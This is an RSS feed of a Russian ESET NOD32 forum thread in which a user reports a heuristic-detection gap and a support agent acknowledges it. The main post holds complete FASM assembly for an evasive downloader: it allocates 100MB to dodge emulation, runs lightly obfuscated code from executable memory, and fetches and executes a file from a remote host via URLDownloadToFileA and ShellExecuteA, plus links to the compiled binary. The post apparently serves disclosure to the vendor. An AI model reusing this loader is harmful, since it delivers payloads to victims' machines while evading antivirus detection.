<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Недостаток эвриста NOD32]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Недостаток эвриста NOD32 форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Sat, 25 Apr 2026 02:12:44 +0300</pubDate>
		<item>
			<title>Недостаток эвриста NOD32</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic4089/message33204/">Недостаток эвриста NOD32</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Ваш запрос в техподдержку получен и передан в вирусную лабораторию. <br />
			<i>10.02.2012 10:49:34, Валентин.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic4089/message33204/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic4089/message33204/</guid>
			<pubDate>Fri, 10 Feb 2012 10:49:34 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Недостаток эвриста NOD32</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic4089/message33201/">Недостаток эвриста NOD32</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Это простая программа для тестирования антивирусов. Она скачивает и запускает файл &quot;<noindex><a href="http://10.1.0.140/notepad.exe" target="_blank" rel="nofollow">http://10.1.0.140/notepad.exe</a></noindex>&quot;.<br />Программа пытается выделить область памяти в 100Мб, если не удается, то завершается, если удается, то копирует в данную память и передает управление на немного обфусцированный код, который скачивает и запускает файл. Если пытаться выделять меньше 10 МБ, то ESET NOD32 детектирует данную программу.<br /><br />
====code====
<pre>
format pe GUI 4.0
entry main
include 'win32ax.inc'
section ''code import writeable readable executable
library kernel32,'kernel32'
import kernel32,ExitProcess,'ExitProcess',&#92;
VirtualAlloc,'VirtualAlloc',&#92;
LoadLib,'LoadLibraryA',&#92;
GetProcAdd, 'GetProcAddress',&#92;
FreeLib, 'FreeLibrary'

main:
invoke VirtualAlloc,NULL,1024*1024*100,0x1000,0x40
cmp eax,0
je endprog
mov esi,eax
xor ecx,ecx
mov edx,ldcode
memcp:
mov bl, &#91;edx&#93;
mov &#91;eax&#93;, bl
inc eax
inc edx
inc ecx
cmp ecx,1023
je endprog
;-eOfCd-
cmp byte &#91;edx&#93;,'-'
jne memcp
cmp byte &#91;edx+1&#93;,'e'
jne memcp
cmp byte &#91;edx+2&#93;,'O'
jne memcp
cmp byte &#91;edx+3&#93;,'f'
jne memcp
cmp byte &#91;edx+4&#93;,'C'
jne memcp
cmp byte &#91;edx+5&#93;,'d'
jne memcp
cmp byte &#91;edx+6&#93;,'-'
jne memcp
jmp esi
endprog:
invoke ExitProcess,0

ldcode:
;&#91;esi&#93;
mov edi,esi
add edi,10
add esi,109
jmp esi
;&#91;edi&#93;
;_urlmon
db&nbsp;&nbsp;&nbsp;'vsmnpo/emm',1;urlmon.dll
;&#91;edi+11&#93;
;_shell
db&nbsp;&nbsp;&nbsp;'tifmm43/emm',1;shell32.dll
;&#91;edi+23&#93;
;_URLDownloadToFile
db&nbsp;&nbsp;&nbsp;'VSMEpxompbeUpGjmfB',1;URLDownloadToFileA
;&#91;edi+42&#93;
;_ShellExecute
db&nbsp;&nbsp;&nbsp;'TifmmFyfdvufB',1;ShellExecuteA
;&#91;edi+56&#93;
;_file
db&nbsp;&nbsp;&nbsp; '`uftu`/fyf',1
;'_test_.exe',0
;&#91;edi+67&#93;
;_url
db&nbsp;&nbsp;&nbsp; 'iuuq;0021/2/1/2510opufqbe/fyf',1,2
;'http://10.1.0.140/notepad.exe',0,1
db 3Ch
;&#91;edi+99&#93;
;&#91;esi&#93;
mov ecx,146420
;&#91;esi+5&#93;
mov ebx,edx
xor eax,eax
dec ecx
lahf
and eax,100000000000000b
shr eax,14
mov edx,esi
add edx,5
imul eax,1Bh
add edx,eax
jmp edx

db 1Ah

;&#91;esi+1Bh&#93;
xor eax, eax
;&#91;esi+1Dh&#93;
mov ecx, edi
;&#91;esi+1Fh&#93;
mov ebx, edi
;&#91;esi+21h&#93;
add esi,29h
;&#91;esi&#93;
cmp byte &#91;ebx&#93;, 2
lahf
and eax,100000000000000b
shr eax,14
mov edx,esi
;add edx,1Ch
imul eax,1Ah
add edx,eax
dec byte &#91;ebx&#93;
inc ebx
push edi
jmp edx
db 0FFh
;&#91;esi+1Ah&#93;
call &#91;LoadLib&#93;
;get procAdd from urldownloadtofile.
mov edx,edi
add edx,23
push edx
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;push _URLDownloadToFile
push eax
call &#91;GetProcAdd&#93;

;downloades our target file and save it to _file
&nbsp;&nbsp;&nbsp;push eax
&nbsp;&nbsp;&nbsp;push 0
&nbsp;&nbsp;&nbsp;push 0
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;push _file
&nbsp;&nbsp;&nbsp;mov edx,edi
&nbsp;&nbsp;&nbsp;add edx,56
&nbsp;&nbsp;&nbsp;push edx
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push _url
&nbsp;&nbsp;&nbsp;mov edx,edi
&nbsp;&nbsp;&nbsp;add edx,67
&nbsp;&nbsp;&nbsp;push edx
&nbsp;&nbsp;&nbsp;push 0
&nbsp;&nbsp;&nbsp;call eax
&nbsp;&nbsp;&nbsp;pop eax
&nbsp;&nbsp;&nbsp;invoke FreeLib, eax

;loads shell32.dll
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push _shell
&nbsp;&nbsp;&nbsp;mov edx,edi
&nbsp;&nbsp;&nbsp;add edx,11
&nbsp;&nbsp;&nbsp;invoke LoadLib, edx

;get procAdd from shellexec
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;push _ShellExecute
&nbsp;&nbsp;&nbsp;mov edx,edi
&nbsp;&nbsp;&nbsp;add edx,42
&nbsp;&nbsp;&nbsp;push edx
&nbsp;&nbsp;&nbsp;push eax
&nbsp;&nbsp;&nbsp;call &#91;GetProcAdd&#93;

&nbsp;&nbsp;&nbsp;
;runs _file using shellexec
&nbsp;&nbsp;&nbsp;push eax
&nbsp;&nbsp;&nbsp;push SW_SHOW
&nbsp;&nbsp;&nbsp;push 0
&nbsp;&nbsp;&nbsp;push 0
&nbsp;&nbsp;&nbsp;mov edx,edi
&nbsp;&nbsp;&nbsp;add edx,56
&nbsp;&nbsp;&nbsp;push edx
&nbsp;&nbsp;&nbsp;;push _file
&nbsp;&nbsp;&nbsp;push 0
&nbsp;&nbsp;&nbsp;push 0
&nbsp;&nbsp;&nbsp;call eax
&nbsp;&nbsp;&nbsp;pop eax
&nbsp;&nbsp;&nbsp;invoke FreeLib, eax

&nbsp;&nbsp;&nbsp;invoke ExitProcess, 0

endsig db '-eOfCd-'
</pre>
=============
<br /><br />Отчет вирустотала:<br /><noindex><a href="https://www.virustotal.com/file/acf03eea070f30f09e62305465f14d04a44318fb9f5259bc2cb5838e027af0e1/analysis/1328850462/" target="_blank" rel="nofollow">https://www.virustotal.com/file/acf03eea070f30f09e62305465f14d04a44318fb9f5259bc2cb<WBR/>&shy;5838e027af0e1/analysis/1328850462/</a></noindex><br /><br />Сам файл:<br /><noindex><a href="http://rghost.ru/36438523" target="_blank" rel="nofollow">http://rghost.ru/36438523</a></noindex><br /><br />Также отправил данную информацию через <noindex><a href="http://esetnod32.ru/.support/knowledge_base/new_virus/index.php" target="_blank" rel="nofollow">http://esetnod32.ru/.support/knowledge_base/new_virus/index.php</a></noindex> (на английском языке). <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=7256">dl-test-enc-dynld-jmp.ASM.txt</a><br /><i>10.02.2012 09:59:45, av-fasm.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic4089/message33201/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic4089/message33201/</guid>
			<pubDate>Fri, 10 Feb 2012 09:59:45 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
